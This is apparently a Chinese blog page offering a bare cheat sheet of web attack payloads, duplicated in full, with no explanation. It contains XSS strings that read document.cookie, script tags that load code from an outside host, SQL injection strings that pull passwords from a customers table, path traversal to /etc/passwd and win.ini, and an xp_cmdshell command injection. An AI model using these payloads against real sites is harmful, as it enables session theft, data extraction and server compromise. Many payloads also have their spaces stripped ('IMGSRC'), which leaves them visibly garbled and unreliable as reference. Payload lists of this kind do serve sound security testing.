XSS测试语句大全
测试 语句 大全 XSS
2023-06-13 09:13:41 时间
"><script>alert(document.cookie)</script>
="><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert("XSS")%3C/script%3E
<script>alert("XSS")</script>
<imgsrc="javascript:alert("XSS")">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert("Vulnerable");</script>
<script>alert("Vulnerable")</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert("Vulnerable")</script>
a/
a?<script>alert("Vulnerable")</script>
"><script>alert("Vulnerable")</script>
";exec%20master..xp_cmdshell%20"dir%20c:%20>%20c:\inetpub\wwwroot\?.txt"--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
"";!--"<XSS>=&{()}
<IMGSRC="javascript:alert("XSS");">
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=JaVaScRiPt:alert("XSS")>
<IMGSRC=JaVaScRiPt:alert("XSS")>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC="jav ascript:alert("XSS");">
<IMGSRC="jav ascript:alert("XSS");">
<IMGSRC="javascript:alert("XSS");">
"<IMGSRC=java\0script:alert(\"XSS\")>";">out
<IMGSRC="javascript:alert("XSS");">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODYBACKGROUND="javascript:alert("XSS")">
<BODYONLOAD=alert("XSS")>
<IMGDYNSRC="javascript:alert("XSS")">
<IMGLOWSRC="javascript:alert("XSS")">
<BGSOUNDSRC="javascript:alert("XSS");">
<brsize="&{alert("XSS")}">
<LAYERSRC="http://xss.ha.ckers.org/a.js"></layer>
<LINKREL="stylesheet"HREF="javascript:alert("XSS");">
<IMGSRC="vbscript:msgbox("XSS")">
<IMGSRC="mocha:[code]">
<IMGSRC="livescript:[code]">
<METAHTTP-EQUIV="refresh"CONTENT="0;url=javascript:alert("XSS");">
<IFRAMESRC=javascript:alert("XSS")></IFRAME>
<FRAMESET><FRAMESRC=javascript:alert("XSS")></FRAME></FRAMESET>
<TABLEBACKGROUND="javascript:alert("XSS")">
<DIVSTYLE="background-image:url(javascript:alert("XSS"))">
<DIVSTYLE="behaviour:url("http://www.how-to-hack.org/exploit.html");">
<DIVSTYLE="width:expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMGSTYLE="xss:expre\ssion(alert("XSS"))">
<STYLETYPE="text/javascript">alert("XSS");</STYLE>
<STYLETYPE="text/css">.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><ACLASS=XSS></A>
<STYLEtype="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
<BASEHREF="javascript:alert("XSS");//">
getURL("javascript:alert("XSS")")
a="get";b="URL";c="javascript:";d="alert("XSS");";eval(a+b+c+d);
<XMLSRC="javascript:alert("XSS");">
"><BODYONLOAD="a();"><SCRIPT>functiona(){alert("XSS");}</SCRIPT><"
<SCRIPTSRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMGSRC="javascript:alert("XSS")"
<!--#execcmd="/bin/echo"<SCRIPTSRC""--><!--#execcmd="/bin/echo"=http://xss.ha.ckers.org/a.js></SCRIPT>""-->
<IMGSRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPTa=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPTa=">"""SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT"a=">""SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<AHREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin"--
"or0=0--
"or0=0--
or0=0--
"or0=0#
"or0=0#
or0=0#
"or"x"="x
"or"x"="x
")or("x"="x
"or1=1--
"or1=1--
or1=1--
"ora=a--
"or"a"="a
")or("a"="a
")or("a"="a
hi"or"a"="a
hi"or1=1--
hi"or1=1--
hi"or"a"="a
hi")or("a"="a
hi")or("a"="a
="><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert("XSS")%3C/script%3E
<script>alert("XSS")</script>
<imgsrc="javascript:alert("XSS")">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert("Vulnerable");</script>
<script>alert("Vulnerable")</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert("Vulnerable")</script>
a/
a?<script>alert("Vulnerable")</script>
"><script>alert("Vulnerable")</script>
";exec%20master..xp_cmdshell%20"dir%20c:%20>%20c:\inetpub\wwwroot\?.txt"--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
"";!--"<XSS>=&{()}
<IMGSRC="javascript:alert("XSS");">
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=JaVaScRiPt:alert("XSS")>
<IMGSRC=JaVaScRiPt:alert("XSS")>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC=javascript:alert("XSS")>
<IMGSRC="jav ascript:alert("XSS");">
<IMGSRC="jav ascript:alert("XSS");">
<IMGSRC="javascript:alert("XSS");">
"<IMGSRC=java\0script:alert(\"XSS\")>";">out
<IMGSRC="javascript:alert("XSS");">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODYBACKGROUND="javascript:alert("XSS")">
<BODYONLOAD=alert("XSS")>
<IMGDYNSRC="javascript:alert("XSS")">
<IMGLOWSRC="javascript:alert("XSS")">
<BGSOUNDSRC="javascript:alert("XSS");">
<brsize="&{alert("XSS")}">
<LAYERSRC="http://xss.ha.ckers.org/a.js"></layer>
<LINKREL="stylesheet"HREF="javascript:alert("XSS");">
<IMGSRC="vbscript:msgbox("XSS")">
<IMGSRC="mocha:[code]">
<IMGSRC="livescript:[code]">
<METAHTTP-EQUIV="refresh"CONTENT="0;url=javascript:alert("XSS");">
<IFRAMESRC=javascript:alert("XSS")></IFRAME>
<FRAMESET><FRAMESRC=javascript:alert("XSS")></FRAME></FRAMESET>
<TABLEBACKGROUND="javascript:alert("XSS")">
<DIVSTYLE="background-image:url(javascript:alert("XSS"))">
<DIVSTYLE="behaviour:url("http://www.how-to-hack.org/exploit.html");">
<DIVSTYLE="width:expression(alert("XSS"));">
<STYLE>@im\port"\ja\vasc\ript:alert("XSS")";</STYLE>
<IMGSTYLE="xss:expre\ssion(alert("XSS"))">
<STYLETYPE="text/javascript">alert("XSS");</STYLE>
<STYLETYPE="text/css">.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><ACLASS=XSS></A>
<STYLEtype="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
<BASEHREF="javascript:alert("XSS");//">
getURL("javascript:alert("XSS")")
a="get";b="URL";c="javascript:";d="alert("XSS");";eval(a+b+c+d);
<XMLSRC="javascript:alert("XSS");">
"><BODYONLOAD="a();"><SCRIPT>functiona(){alert("XSS");}</SCRIPT><"
<SCRIPTSRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMGSRC="javascript:alert("XSS")"
<!--#execcmd="/bin/echo"<SCRIPTSRC""--><!--#execcmd="/bin/echo"=http://xss.ha.ckers.org/a.js></SCRIPT>""-->
<IMGSRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPTa=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT=">"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPTa=">"""SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT"a=">""SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<AHREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin"--
"or0=0--
"or0=0--
or0=0--
"or0=0#
"or0=0#
or0=0#
"or"x"="x
"or"x"="x
")or("x"="x
"or1=1--
"or1=1--
or1=1--
"ora=a--
"or"a"="a
")or("a"="a
")or("a"="a
hi"or"a"="a
hi"or1=1--
hi"or1=1--
hi"or"a"="a
hi")or("a"="a
hi")or("a"="a
相关文章
- 软件评测师-自动化测试技术
- JMH基准测试
- 试试使用 Vitest 进行组件测试,确实很香。
- 测试必备:推荐一款跨平台App性能专项测试工具!
- laravel+Redis简单实现队列通过压力测试的高并发处理
- 【测试开发】python系列教程:循环语句
- 测试
- Shell脚本 | 性能测试之CPU占有率详解程序员
- 深入Linux:高级渗透测试技术(Linux高级渗透测试)
- 测试机器大小端存储的方法详解编程语言
- Linux下的串口探查之旅(linux下串口测试)
- 使用Linux测试丢包:原理与技巧(linux测试丢包)
- 在线快速测试Oracle语句的技巧(oracle语句在线测试)
- Efficient Oracle Testing: Practical Tips for Optimizing Your Test Tables(oracle测试表)
- Sql语句与存储过程查询数据的性能测试实现代码